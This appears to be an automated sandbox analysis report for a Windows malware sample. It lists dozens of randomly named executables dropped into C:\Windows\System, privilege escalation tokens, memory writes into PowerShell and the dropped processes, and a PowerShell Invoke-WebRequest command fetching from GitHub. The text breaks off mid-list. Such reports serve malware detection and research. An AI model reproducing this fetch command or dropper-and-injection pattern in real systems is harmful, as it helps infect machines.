File created C:\Windows\System\pJmXdAX.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\aDZFTiI.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\kIqHFTn.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\UawLkBE.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\eSrzgLt.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\fkEdrzQ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ptPEtRb.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\GMShmlW.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\eGEvIdd.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\bYEOOLb.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\fTLwZcn.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mwpJgSI.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\CHiQgOw.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\wvMJLKd.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\qwmUqer.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\tDXTrzQ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\SJHJHQQ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\jmTIXQw.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ZTeJsAX.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\whkHmqP.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\uOErrjx.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\LsvvfNE.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\xtagYCO.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\azKBqeu.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\GVQGnLX.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\LDDRYno.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\tYJVPDZ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\aGRYNfJ.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\NglyrCg.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\OITkQPn.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\NDlfjBP.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\kcfGMZw.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\mtGaRwH.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\tZulLbA.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\wLzbhBG.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\JpzpCgt.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ViOsgFr.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\dfSyBTs.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\yVsCiTn.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\TFtWLll.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\keNiJxk.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\IOqYsCb.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ARQdxVp.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ZXuIcQi.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\uslArxm.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\ArGyxlR.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\csGNBSz.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\bOrozOu.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\MpWCcwo.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\vxNUXRz.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\eFVbwTn.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
File created C:\Windows\System\TmrzKoy.exe C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2388 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2388 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2388 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\MkWwWWu.exe
PID 2388 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\MkWwWWu.exe
PID 2388 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\sZznUib.exe
PID 2388 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\sZznUib.exe
PID 2388 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\BVwPByv.exe
PID 2388 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\BVwPByv.exe
PID 2388 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\XQShQqQ.exe
PID 2388 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\XQShQqQ.exe
PID 2388 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\XkxDRyE.exe
PID 2388 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\XkxDRyE.exe
PID 2388 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\RJpfNeR.exe
PID 2388 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\RJpfNeR.exe
PID 2388 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\xyPPoCI.exe
PID 2388 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\xyPPoCI.exe
PID 2388 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\DWvsypp.exe
PID 2388 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\DWvsypp.exe
PID 2388 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\LlYuGQr.exe
PID 2388 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\LlYuGQr.exe
PID 2388 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\oOyUCRl.exe
PID 2388 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\oOyUCRl.exe
PID 2388 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\yEwepFp.exe
PID 2388 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\yEwepFp.exe
PID 2388 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\PpEHevo.exe
PID 2388 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\PpEHevo.exe
PID 2388 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\iURvfUJ.exe
PID 2388 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\iURvfUJ.exe
PID 2388 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\vZPYhME.exe
PID 2388 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\vZPYhME.exe
PID 2388 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\wUtbeMY.exe
PID 2388 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\wUtbeMY.exe
PID 2388 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\UvkHGyq.exe
PID 2388 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\UvkHGyq.exe
PID 2388 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\NFrAZex.exe
PID 2388 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\NFrAZex.exe
PID 2388 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JIABtjC.exe
PID 2388 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JIABtjC.exe
PID 2388 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\FWnHglA.exe
PID 2388 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\FWnHglA.exe
PID 2388 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\VDipaHs.exe
PID 2388 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\VDipaHs.exe
PID 2388 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\wFiLZDg.exe
PID 2388 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\wFiLZDg.exe
PID 2388 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\RJhZjyd.exe
PID 2388 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\RJhZjyd.exe
PID 2388 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\DZbxwbK.exe
PID 2388 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\DZbxwbK.exe
PID 2388 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\DYchtCr.exe
PID 2388 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\DYchtCr.exe
PID 2388 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\SBsmluc.exe
PID 2388 wrote to memory of 3900 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\SBsmluc.exe
PID 2388 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\xjRwRst.exe
PID 2388 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\xjRwRst.exe
PID 2388 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\ZXuIcQi.exe
PID 2388 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\ZXuIcQi.exe
PID 2388 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\VDcKDtX.exe
PID 2388 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\VDcKDtX.exe
PID 2388 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\iUgOFqw.exe
PID 2388 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\iUgOFqw.exe
PID 2388 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\xvCXvgF.exe
PID 2388 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\xvCXvgF.exe
PID 2388 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JUVJTSc.exe
PID 2388 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe C:\Windows\System\JUVJTSc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\683d7e72a365ac93c5ecbf2223fde2e3_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\MkWwWWu.exe

C:\Windows\System\MkWwWWu.exe

C:\Windows\System\sZznUib.exe

C:\Windows\System\sZznUib.exe

C:\Windows\System\BVwPByv.exe

C:\Windows\System\BVwPByv.exe

C:\Windows\System\XQShQqQ.exe

C:\Windows\System\XQShQqQ.exe

C:\Windows\System\XkxDRyE.exe

C:\Windows\System\XkxDRyE.exe

C:\Windows\System\RJpfNeR.exe

C:\Windows\System\RJpfNeR.exe

C:\Windows\System\xyPPoCI.exe

C:\Windows\System\xyPPoCI.exe

C:\Windows\System\DWvsypp.exe

C:\Windows\System\DWvsypp.exe

C:\Windows\System\LlYuGQr.exe

C:\Windows\System\LlYuGQr.exe

C:\Windows\System\oOyUCRl.exe

C:\Windows\System\oOyUCRl.exe

C:\Windows\System\yEwepFp.exe

C:\Windows\System\yEwepFp.exe

C:\Windows\System\PpEHevo.exe

C:\Windows\System\PpEHevo.exe

C:\Windows\System\iURvfUJ.exe

C:\Windows\System\iURvfUJ.exe

C:\Windows\System\vZPYhME.exe

C:\Windows\System\vZPYhME.exe

C:\Windows\System\wUtbeMY.exe

C:\Windows\System\wUtbeMY.exe

C:\Windows\System\UvkHGyq.exe

C:\Windows\System\UvkHGyq.exe

C:\Windows\System\NFrAZex.exe

C:\Windows\System\NFrAZex.exe

C:\Windows\System\JIABtjC.exe

C:\Windows\System\JIABtjC.exe

C:\Windows\System\FWnHglA.exe

C:\Windows\System\FWnHglA.exe

C:\Windows\System\VDipaHs.exe

C:\Windows\System\VDipaHs.exe

C:\Windows\System\wFiLZDg.exe

C:\Windows\System\wFiLZDg.exe

C:\Windows\System\RJhZjyd.exe

C:\Windows\System\RJhZjyd.exe

C:\Windows\System\DZbxwbK.exe

C:\Windows\System\DZbxwbK.exe

C:\Windows\System\DYchtCr.exe

C:\Windows\System\DYchtCr.exe

C:\Windows\System\SBsmluc.exe

C:\Windows\System\SBsmluc.exe

C:\Windows\System\xjRwRst.exe

C:\Windows\System\xjRwRst.exe

C:\Windows\System\ZXuIcQi.exe

C:\Windows\System\ZXuIcQi.exe

C:\Windows\System\VDcKDtX.exe

C:\Windows\System\VDcKDtX.exe

C:\Windows\System\iUgOFqw.exe

C:\Windows\System\iUgOFqw.exe

C:\Windows\System\xvCXvgF.exe

C:\Windows\System\xvCXvgF.exe

C:\Windows\System\JUVJTSc.exe

C:\Windows\System\JUVJTSc.exe

C:\Windows\System\cCYSZvE.exe

C:\Windows\System\cCYSZvE.exe

C:\Windows\System\RAsBsbW.exe

C:\Windows\System\RAsBsbW.exe

C:\Windows\System\uuaVkEP.exe

C:\Windows\System\uuaVkEP.exe

C:\Windows\System\AwyNlbq.exe

C:\Windows\System\AwyNlbq.exe

C:\Windows\System\GlJytUh.exe

C:\Windows\System\GlJytUh.exe

C:\Windows\System\jIprdUB.exe

C:\Windows\System\jIprdUB.exe

C:\Windows\System\amUbDqO.exe

C:\Windows\System\amUbDqO.exe

C:\Windows\System\jbNvNgZ.exe

C:\Windows\System\jbNvNgZ.exe

C:\Windows\System\RRvafBb.exe

C:\Windows\System\RRvafBb.exe

C:\Windows\System\BrlKFzI.exe

C:\Windows\System\BrlKFzI.exe

C:\Windows\System\CfKWllz.exe

C:\Windows\System\CfKWllz.exe

C:\Windows\System\bXhEBai.exe

C:\Windows\System\bXhEBai.exe

C:\Windows\System\RTfAuxZ.exe

C:\Windows\System\RTfAuxZ.exe

C:\Windows\System\anmNHOV.exe

C:\Windows\System\anmNHOV.exe

C:\Windows\System\vHsnaIX.exe

C:\Windows\System\vHsnaIX.exe

C:\Windows\System\elJBdCf.exe

C:\Windows\System\elJBdCf.exe

C:\Windows\System\jfIKHPK.exe

C:\Windows\System\jfIKHPK.exe

C:\Windows\System\pJmXdAX.exe

C:\Windows\System\pJmXdAX.exe

C:\Windows\System\QhlyFzn.exe

C:\Windows\System\QhlyFzn.exe

C:\Windows\System\KrPsRIC.exe

C:\Windows\System\KrPsRIC.exe

C:\Windows\System\EMIrBGs.exe

C:\Windows\System\EMIrBGs.exe

C:\Windows\System\sCWyikM.exe

C:\Windows\System\sCWyikM.exe

C:\Windows\System\BRWpmmA.exe

C:\Windows\System\BRWpmmA.exe

C:\Windows\System\XNhBZmz.exe

C:\Windows\System\XNhBZmz.exe

C:\Windows\System\mfBpSLL.exe

C:\Windows\System\mfBpSLL.exe

C:\Windows\System\Itogmwb.exe

C:\Windows\System\Itogmwb.exe

C:\Windows\System\wzwTsNd.exe

C:\Windows\System\wzwTsNd.exe

C:\Windows\System\NBprgBx.exe

C:\Windows\System\NBprgBx.exe

C:\Windows\System\DQpehqu.exe

C:\Windows\System\DQpehqu.exe

C:\Windows\System\XPOXUaF.exe

C:\Windows\System\XPOXUaF.exe

C:\Windows\System\CRXnMyY.exe

C:\Windows\System\CRXnMyY.exe

C:\Windows\System\PEmDwtF.exe

C:\Windows\System\PEmDwtF.exe

C:\Windows\System\UawLkBE.exe

C:\Windows\System\UawLkBE.exe

C:\Windows\System\gcpdTsH.exe

C:\Windows\System\gcpdTsH.exe

C:\Windows\System\aEzyJzT.exe

C:\Windows\System\aEzyJzT.exe

C:\Windows\System\aunhdgJ.exe

C:\Windows\System\aunhdgJ.exe

C:\Windows\System\vaBHiBf.exe

C:\Windows\System\vaBHiBf.exe

C:\Windows\System\muFxLXe.exe

C:\Windows\System\muFxLXe.exe

C:\Windows\System\yyTwVEo.exe

C:\Windows\System\yyTwVEo.exe

C:\Windows\System\gGqvcQV.exe

C:\Windows\System\gGqvcQV.exe

C:\Windows\System\VUYsVzb.exe

C:\Windows\System\VUYsVzb.exe

C:\Windows\System\wLzbhBG.exe

C:\Windows\System\wLzbhBG.exe

C:\Windows\System\lwcPgLK.exe

C:\Windows\System\lwcPgLK.exe

C:\Windows\System\rMOffLS.exe

C:\Windows\System\rMOffLS.exe

C:\Windows\System\FMCZwgN.exe

C:\Windows\System\FMCZwgN.exe

C:\Windows\System\RwLmfNt.exe

C:\Windows\System\RwLmfNt.exe

C:\Windows\System\zbywgRU.exe

C:\Windows\System\zbywgRU.exe

C:\Windows\System\xAbhiME.exe

C:\Windows\System\xAbhiME.exe

C:\Windows\System\deqMKut.exe

C:\Windows\System\deqMKut.exe

C:\Windows\System\hOTtOXs.exe

C:\Windows\System\hOTtOXs.exe

C:\Windows\System\PLlruar.exe

C:\Windows\System\PLlruar.exe

C:\Windows\System\gttPrWO.exe

C:\Windows\System\gttPrWO.exe

C:\Windows\System\oYMfmzW.exe

C:\Windows\System\oYMfmzW.exe

C:\Windows\System\bOrozOu.exe

C:\Windows\System\bOrozOu.exe

C:\Windows\System\hXQzHrN.exe

C:\Windows\System\hXQzHrN.exe

C:\Windows\System\WrrXply.exe

C:\Windows\System\WrrXply.exe

C:\Windows\System\ptPEtRb.exe

C:\Windows\System\ptPEtRb.exe

C:\Windows\System\nVaRGol.exe

C:\Windows\System\nVaRGol.exe

C:\Windows\System\yOpHZBp.exe

C:\Windows\System\yOpHZBp.exe

C:\Windows\System\gjaywYu.exe

C:\Windows\System\gjaywYu.exe

C:\Windows\System\tlzzfTP.exe

C:\Windows\System\tlzzfTP.exe

C:\Windows\System\JwHFeBF.exe

C:\Windows\System\JwHFeBF.exe

C:\Windows\System\azKBqeu.exe

C:\Windows\System\azKBqeu.exe

C:\Windows\System\rRAxIda.exe

C:\Windows\System\rRAxIda.exe

C:\Windows\System\rXDeRHQ.exe

C:\Windows\System\rXDeRHQ.exe

C:\Windows\System\CUmCAKY.exe

C:\Windows\System\CUmCAKY.exe

C:\Windows\System\NWwGJDA.exe

C:\Windows\System\NWwGJDA.exe

C:\Windows\System\bqKpMOO.exe

C:\Windows\System\bqKpMOO.exe

C:\Windows\System\jAABJkV.exe

C:\Windows\System\jAABJkV.exe

C:\Windows\System\ntccUaO.exe

C:\Windows\System\ntccUaO.exe

C:\Windows\System\AvOcqJy.exe

C:\Windows\System\AvOcqJy.exe

C:\Windows\System\CVlGZBh.exe

C:\Windows\System\CVlGZBh.exe

C:\Windows\System\yvZumcH.exe

C:\Windows\System\yvZumcH.exe

C:\Windows\System\eYTueLt.exe

